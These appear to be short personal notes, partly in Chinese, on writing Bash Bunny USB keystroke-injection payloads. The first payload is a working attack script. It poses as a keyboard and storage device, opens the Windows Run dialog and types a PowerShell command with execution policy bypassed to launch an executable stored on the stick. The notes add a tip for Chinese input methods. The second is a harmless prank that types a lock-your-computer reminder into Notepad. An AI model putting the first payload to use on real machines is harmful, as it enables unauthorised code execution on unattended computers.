bashbunny

HID STORAGE模式识别为u盘

Q STRING后面的字符串不能很长，如果需要，声明字符串变量即可。
以下示例针对中文输入法。

LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

LED ATTACK
# Run the run.ps1 script in the BashBunny



powershell="Powershell -nop -ex Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\tst.exe')"

#RUN WIN Powershell -nop -ex Bypass  ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\tst.exe')"


Q GUI r
Q DELAY 150
Q SHIFT
Q DELAY 150
Q STRING $powershell
Q ENTER

LED G 0

HID模式识别为人体工程学设备

LED B G 100
msg_header="begining"
msg_body="I will learn to lock my computer"
msg_body_repeats=10
msg_end="Please remember to lock your computer when you walk away."

ATTACKMODE HID
Q GUI r
Q DELAY 150
Q STRING notepad.exe
Q ENTER
LED B 500

Q DELAY 200
Q STRING $msg_header
Q ENTER

for (( i=1; i<=$msg_body_repeats; i++ ))
do
   Q STRING $msg_body
   Q ENTER
done
Q STRING $msg_end
Q ENTER
LED G 0